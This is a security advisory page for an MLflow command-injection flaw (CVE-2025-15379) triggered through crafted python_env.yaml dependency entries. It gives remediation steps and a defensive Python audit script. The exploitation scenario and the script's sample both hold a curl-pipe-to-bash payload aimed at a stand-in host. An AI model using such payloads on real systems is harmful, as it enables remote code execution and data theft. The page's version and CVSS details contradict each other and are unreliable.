CVE-2025-15379: MLflow: RCE via unsanitized model dependency specs

GHSA-r23q-823p-vmf7 CRITICAL CISA: ATTEND
Published March 30, 2026
CISO Take

MLflow deployments loading models with env_manager=LOCAL are vulnerable to arbitrary command execution through crafted python_env.yaml files embedded in model artifacts. Patch to 3.8.2 immediately and enforce model provenance controls. Any pipeline that automatically deploys models from shared or external registries should be treated as actively at risk until patched.

What is the risk?

High risk in MLOps environments with shared model registries or automated deployment pipelines. Exploitation requires only model upload access — trivial for insider threats and feasible for external attackers who compromise model sources or CI/CD pipelines. The attack yields full RCE with MLflow process privileges, which in cloud ML platforms typically includes IAM roles, storage access, and lateral movement capability into connected ML infrastructure. The absence of CVSS data reflects disclosure timing, not reduced severity.

What systems are affected?

Package: MLflow
Ecosystem: pip
Vulnerable Range: < 3.8.1
Patched: 3.8.1

Do you use MLflow? You're affected.

How severe is it?

CVSS 3.1: 10.0 / 10
EPSS: 0.3% chance of exploitation in 30 days (higher than 52% of all CVEs)
Exploitation Status: Exploit Available (Exploitation: MEDIUM)
Sophistication: Trivial
Exploitation Confidence: medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

What is the attack surface?

AV: Network
AC: Low
PR: None
UI: None
S: Changed
C: High
I: High
A: High

What should I do?

6 steps
  1. Patch MLflow to version 3.8.2 immediately — primary and definitive remediation.

  2. Until patched: avoid env_manager=LOCAL for models from untrusted sources; evaluate env_manager=CONDA or VIRTUALENV as interim alternatives.

  3. Implement model provenance validation — only deploy cryptographically signed models from approved internal registries.

  4. Restrict write access to model registries to verified CI/CD service accounts with MFA.

  5. Audit all python_env.yaml files in deployed model artifacts for anomalous shell metacharacters or unexpected dependency strings.

  6. Detection: alert on unexpected subprocess spawning or outbound network connections originating from MLflow serving processes.
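Step 5's audit as an added Python example (not MLflow's code and not part of the advisory): it parses the flat python_env.yaml layout without needing PyYAML and flags every dependency entry that is not a plain PEP 508 requirement, reporting which shell metacharacters it found. The sample file, including its evil.invalid host, is constructed for the example.

```python
"""Audit an MLflow python_env.yaml for non-requirement dependency entries (added example)."""
import re
# Constructed sample in MLflow's python_env.yaml layout; the last entry mirrors the advisory's
# injected-marker style, with a placeholder host.
SAMPLE_PYTHON_ENV = """\
python: 3.10.12
build_dependencies:
  - pip==23.3.1
dependencies:
  - numpy>=1.24,<2
  - scikit-learn[extra]==1.3.2
  - torch==2.0.0; curl -s evil.invalid/implant.sh | bash #
"""
# Allowlist: PEP 508 name, optional [extras], optional comma-separated version specs. PEP 508
# environment markers (';' clause) are excluded on purpose: ';' is also the shell separator.
_SAFE_REQ = re.compile(
    r"^[A-Za-z0-9][A-Za-z0-9._-]*"                # distribution name
    r"(\[[A-Za-z0-9._-]+(,[A-Za-z0-9._-]+)*\])?"  # optional extras
    r"(\s*(===|==|~=|!=|<=|>=|<|>)\s*[A-Za-z0-9.*+!-]+"
    r"(\s*,\s*(===|==|~=|!=|<=|>=|<|>)\s*[A-Za-z0-9.*+!-]+)*)?$"
)
_SAFE_REQ_FILE = re.compile(r"^-r\s+[A-Za-z0-9._/-]+$")  # e.g. "-r requirements.txt"
_SHELL_META = set(";&|$`<>()\\\"'\n")

def parse_python_env(text):
    """Minimal parser for the flat 'key: value' / 'key:' + '- item' layout; no PyYAML needed."""
    env, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("- ") and current is not None:
            env[current].append(line[2:].strip())
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        env[key] = value or []  # a bare "key:" opens a list for the "- item" lines that follow
        current = key if not value else None
    return env

def audit_dependencies(text):
    """Return (section, entry, reason) for every entry that fails the allowlist."""
    findings, env = [], parse_python_env(text)
    for section in ("build_dependencies", "dependencies"):
        for entry in env.get(section, []):
            if not (_SAFE_REQ.match(entry) or _SAFE_REQ_FILE.match(entry)):
                meta = "".join(sorted(c for c in _SHELL_META if c in entry))
                reason = f"shell metacharacters {meta!r}" if meta else "not a plain requirement"
                findings.append((section, entry, reason))
    return findings
```

Entries that use a legitimate PEP 508 environment marker are also flagged by this conservative check and need a human look rather than an automatic pass.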

What does CISA's SSVC say?

Decision: Attend
Exploitation: poc
Automatable: Yes
Technical Impact: total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2.2 - AI system security
NIST AI RMF
GOVERN 6.1 - AI Supply Chain Risk Management
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

How many AI incidents are linked? (1)

Source: AI Incident Database (AIID)

Frequently Asked Questions

What is CVE-2025-15379?

MLflow deployments loading models with env_manager=LOCAL are vulnerable to arbitrary command execution through crafted python_env.yaml files embedded in model artifacts. Patch to 3.8.2 immediately and enforce model provenance controls. Any pipeline that automatically deploys models from shared or external registries should be treated as actively at risk until patched.

Is CVE-2025-15379 actively exploited?

No confirmed active exploitation of CVE-2025-15379 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-15379?

  1. Patch MLflow to version 3.8.2 immediately — primary and definitive remediation.

  2. Until patched: avoid env_manager=LOCAL for models from untrusted sources; evaluate env_manager=CONDA or VIRTUALENV as interim alternatives.

  3. Implement model provenance validation — only deploy cryptographically signed models from approved internal registries.

  4. Restrict write access to model registries to verified CI/CD service accounts with MFA.

  5. Audit all python_env.yaml files in deployed model artifacts for anomalous shell metacharacters or unexpected dependency strings.

  6. Detection: alert on unexpected subprocess spawning or outbound network connections originating from MLflow serving processes.

What systems are affected by CVE-2025-15379?

This vulnerability affects the following AI/ML architecture patterns: model serving, ML deployment pipelines, MLOps platforms, model registries, training pipelines.

What is the CVSS score for CVE-2025-15379?

CVE-2025-15379 has a CVSS v3.1 base score of 10.0 (CRITICAL). The EPSS exploitation probability is 0.28%.

What is the AI security impact?

Affected AI Architectures

model serving
ML deployment pipelines
MLOps platforms
model registries
training pipelines

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0010.003 Model
AML.T0011.000 Unsafe AI Artifacts
AML.T0050 Command and Scripting Interpreter

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.2.2
NIST AI RMF: GOVERN 6.1
OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_install_model_dependencies_to_env()` function. When deploying a model with `env_manager=LOCAL`, MLflow reads dependency specifications from the model artifact's `python_env.yaml` file and directly interpolates them into a shell command without sanitization. This allows an attacker to supply a malicious model artifact and achieve arbitrary command execution on systems that deploy the model. The vulnerability affects versions 3.8.0 and is fixed in version 3.8.2.

Exploitation Scenario

An attacker with model registry write access — via a compromised developer account, insider threat, or upstream supply chain compromise — uploads a malicious model artifact containing a crafted python_env.yaml with an injected shell payload embedded in a dependency specification (e.g., 'torch==2.0.0; curl -s attacker.com/implant.sh | bash #'). When an automated MLOps pipeline or engineer deploys the model using env_manager=LOCAL, MLflow reads the yaml and interpolates the dependency string directly into a shell command without sanitization. The attacker's payload executes with the privileges of the MLflow process — typically a service account with broad cloud permissions — enabling full host takeover, exfiltration of model weights and training data, and persistence in the ML serving infrastructure.

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Timeline

Published
March 30, 2026
Last Modified
April 1, 2026
First Seen
March 30, 2026
